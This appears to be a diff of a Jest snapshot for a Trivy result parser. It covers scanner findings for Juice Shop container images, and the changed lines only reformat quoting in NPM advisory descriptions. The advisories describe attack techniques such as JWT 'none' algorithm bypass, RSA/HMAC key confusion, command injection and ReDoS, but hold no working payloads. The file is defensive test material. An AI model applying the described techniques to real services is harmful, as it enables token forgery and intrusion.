9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -12346,8 +12354,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -12487,11 +12497,13 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2016-1000223", }, "category": "NPM Package Vulnerability", - "description": "Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. + "description": +"Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. In addition, there is the \`none\` algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the \`alg\` field is set to \`none\`. -*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*", +*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package jws to the fixed version: >=3.0.0 or remove the package from the image.", "name": "Forgeable Public/Private Tokens", @@ -14285,12 +14297,14 @@ In addition, there is the \`none\` algorithm to be concerned about. In versions "vulnerabilityId": "GHSA-5mrr-rgp6-x4gr", }, "category": "NPM Package Vulnerability", - "description": "All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. + "description": +"All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. ## Recommendation -No fix is currently available. Consider using an alternative package until a fix is made available.", +No fix is currently available. Consider using an alternative package until a fix is made available." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package marsdb to the fixed version: undefined or remove the package from the image.", "name": "Command Injection in marsdb", @@ -17088,7 +17102,8 @@ No fix is currently available. Consider using an alternative package until a fix "vulnerabilityId": "GHSA-v78c-4p63-2j6c", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact * if Alice uses \`grunt data\` (or \`grunt release\`) to prepare a custom-build, moment-timezone with the latest tzdata from IANA's website * and Mallory intercepts the request to IANA's unencrypted ftp server, Mallory can serve data which might exploit further stages of the moment-timezone tzdata pipeline, or potentially produce a tainted version of moment-timezone (practicality of such attacks is not proved) @@ -17098,7 +17113,8 @@ Problem has been patched in version 0.5.35, patch should be applicable with mino ### Workarounds Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt data:2014d\`, then run the rest of the release tasks by hand), or just apply the patch before issuing the grunt command. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Cleartext Transmission of Sensitive Information in moment-timezone", @@ -17133,7 +17149,8 @@ Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt "vulnerabilityId": "GHSA-56x4-j7p9-fcf9", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact All versions of moment-timezone from 0.1.0 contain build tasks vulnerable to command injection. @@ -17232,7 +17249,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec ### References * https://knowledge-base.secureflag.com/vulnerabilities/code_injection/os_command_injection_nodejs.html -* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/", +* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Command Injection in moment-timezone", @@ -17675,7 +17693,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec "vulnerabilityId": "GHSA-xgh6-85xh-479p", }, "category": "NPM Package Vulnerability", - "description": "\`npm-user-validate\` before version \`1.0.1\` is vulnerable to a Regular Expression Denial of Service (REDos). The regex that validates user emails took exponentially longer to process long input strings beginning with \`@\` characters. + "description": +"\`npm-user-validate\` before version \`1.0.1\` is vulnerable to a Regular Expression Denial of Service (REDos). The regex that validates user emails took exponentially longer to process long input strings beginning with \`@\` characters. ### Impact The issue affects the \`email\` function. If you use this function to process arbitrary user input with no character limit the application may be susceptible to Denial of Service. @@ -17684,7 +17703,8 @@ The issue affects the \`email\` function. If you use this function to process ar The issue is patched in version 1.0.1 by improving the regular expression used and also enforcing a 254 character limit. ### Workarounds -Restrict the character length to a reasonable degree before passing a value to \`.emal()\`; Also, consider doing a more rigorous sanitizing/validation beforehand.", +Restrict the character length to a reasonable degree before passing a value to \`.emal()\`; Also, consider doing a more rigorous sanitizing/validation beforehand." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package npm-user-validate to the fixed version: 1.0.1 or remove the package from the image.", "name": "Regular Expression Denial of Service in npm-user-validate", @@ -19574,7 +19594,8 @@ Restrict the character length to a reasonable degree before passing a value to \ "vulnerabilityId": "NSWG-ECO-154", }, "category": "NPM Package Vulnerability", - "description": "Sanitize-html is a library for scrubbing html input of malicious values. + "description": +"Sanitize-html is a library for scrubbing html input of malicious values. Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios: @@ -19592,7 +19613,8 @@ var clean = sanitizeHtml(dirty, { console.log(clean); // !! -\`\`\`", +\`\`\`" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package sanitize-html to the fixed version: >=1.11.4 or remove the package from the image.", "name": "Cross Site Scripting", @@ -19654,10 +19676,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -19815,10 +19839,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -19976,10 +20002,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20137,10 +20165,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20298,10 +20328,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20459,10 +20491,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20620,10 +20654,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20781,10 +20817,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20942,10 +20980,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -21505,9 +21545,11 @@ console.log(clean); "vulnerabilityId": "CVE-2022-0355", }, "category": "NPM Package Vulnerability", - "description": "Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. + "description": +"Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package simple-get to the fixed version: 4.0.1, 3.1.1, 2.8.2 or remove the package from the image.", "name": "simple-get: exposure of sensitive information to an unauthorized actor", @@ -21582,8 +21624,10 @@ console.log(clean); "vulnerabilityId": "CVE-2024-38355", }, "category": "NPM Package Vulnerability", - "description": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. -", + "description": +"Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package socket.io to the fixed version: 2.5.1, 4.6.2 or remove the package from the image.", "name": "socket.io: Unhandled 'error' event", @@ -21866,9 +21910,11 @@ console.log(clean); "vulnerabilityId": "CVE-2023-32695", }, "category": "NPM Package Vulnerability", - "description": "socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. + "description": +"socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package socket.io-parser to the fixed version: 4.2.3, 3.4.3, 3.3.4 or remove the package from the image.", "name": "socket.io parser is a socket.io encoder and decoder written in JavaScr ...", @@ -22097,9 +22143,11 @@ console.log(clean); "vulnerabilityId": "CVE-2023-32695", }, "category": "NPM Package Vulnerability", - "description": "socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. + "description": +"socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package socket.io-parser to the fixed version: 4.2.3, 3.4.3, 3.3.4 or remove the package from the image.", "name": "socket.io parser is a socket.io encoder and decoder written in JavaScr ...", @@ -22335,7 +22383,8 @@ console.log(clean); "vulnerabilityId": "GHSA-qrmm-w75w-3wpx", }, "category": "NPM Package Vulnerability", - "description": "SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. + "description": +"SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. However, this functionality may pose a risk for users who host their own SwaggerUI instances. In particular, including remote OpenAPI definitions opens a vector for phishing attacks by abusing the trusted names/domains of self-hosted instances. @@ -22385,7 +22434,8 @@ Through the exploration of this issue, it became apparent that users may not be ## Reflected XSS attack **Warning** in versions < 3.38.0, it is possible to combine the URL options (as mentioned above) with a vulnerability in DOMPurify (https://www.cvedetails.com/cve/CVE-2020-26870/) to create a reflected XSS vector. If your version of Swagger UI is older than 3.38.0, we suggest you upgrade or implement the workaround as mentioned above. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package swagger-ui-dist to the fixed version: 4.1.3 or remove the package from the image.", "name": "Server side request forgery in SwaggerUI", @@ -24025,9 +24075,11 @@ Through the exploration of this issue, it became apparent that users may not be "vulnerabilityId": "CVE-2023-26115", }, "category": "NPM Package Vulnerability", - "description": "All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. + "description": +"All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package word-wrap to the fixed version: 1.2.4 or remove the package from the image.", "name": "word-wrap: ReDoS", @@ -28509,12 +28561,14 @@ exports[`parses bkimminich/juice-shop:v12.10.2 result file into findings 1`] = ` "vulnerabilityId": "GHSA-rvg8-pwq2-xj7q", }, "category": "NPM Package Vulnerability", - "description": "Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. + "description": +"Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. ## Recommendation -Update to version 3.0.0 or later.", +Update to version 3.0.0 or later." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package base64url to the fixed version: 3.0.0 or remove the package from the image.", "name": "Out-of-bounds Read in base64url", @@ -30616,9 +30670,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -30816,9 +30872,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -31639,8 +31697,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -31970,8 +32030,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -32111,11 +32173,13 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2016-1000223", }, "category": "NPM Package Vulnerability", - "description": "Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. + "description": +"Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. In addition, there is the \`none\` algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the \`alg\` field is set to \`none\`. -*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*", +*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package jws to the fixed version: >=3.0.0 or remove the package from the image.", "name": "Forgeable Public/Private Tokens", @@ -33472,12 +33536,14 @@ In addition, there is the \`none\` algorithm to be concerned about. In versions "vulnerabilityId": "GHSA-5mrr-rgp6-x4gr", }, "category": "NPM Package Vulnerability", - "description": "All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. + "description": +"All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. ## Recommendation -No fix is currently available. Consider using an alternative package until a fix is made available.", +No fix is currently available. Consider using an alternative package until a fix is made available." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package marsdb to the fixed version: undefined or remove the package from the image.", "name": "Command Injection in marsdb", @@ -36792,7 +36858,8 @@ No fix is currently available. Consider using an alternative package until a fix "vulnerabilityId": "GHSA-v78c-4p63-2j6c", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact * if Alice uses \`grunt data\` (or \`grunt release\`) to prepare a custom-build, moment-timezone with the latest tzdata from IANA's website * and Mallory intercepts the request to IANA's unencrypted ftp server, Mallory can serve data which might exploit further stages of the moment-timezone tzdata pipeline, or potentially produce a tainted version of moment-timezone (practicality of such attacks is not proved) @@ -36802,7 +36869,8 @@ Problem has been patched in version 0.5.35, patch should be applicable with mino ### Workarounds Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt data:2014d\`, then run the rest of the release tasks by hand), or just apply the patch before issuing the grunt command. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Cleartext Transmission of Sensitive Information in moment-timezone", @@ -36837,7 +36905,8 @@ Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt "vulnerabilityId": "GHSA-56x4-j7p9-fcf9", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact All versions of moment-timezone from 0.1.0 contain build tasks vulnerable to command injection. @@ -36936,7 +37005,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec ### References * https://knowledge-base.secureflag.com/vulnerabilities/code_injection/os_command_injection_nodejs.html -* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/", +* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Command Injection in moment-timezone", @@ -38566,7 +38636,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec "vulnerabilityId": "NSWG-ECO-154", }, "category": "NPM Package Vulnerability", - "description": "Sanitize-html is a library for scrubbing html input of malicious values. + "description": +"Sanitize-html is a library for scrubbing html input of malicious values. Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios: @@ -38584,7 +38655,8 @@ var clean = sanitizeHtml(dirty, { console.log(clean); // !! -\`\`\`", +\`\`\`" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package sanitize-html to the fixed version: >=1.11.4 or remove the package from the image.", "name": "Cross Site Scripting", @@ -38646,10 +38718,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -38807,10 +38881,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. 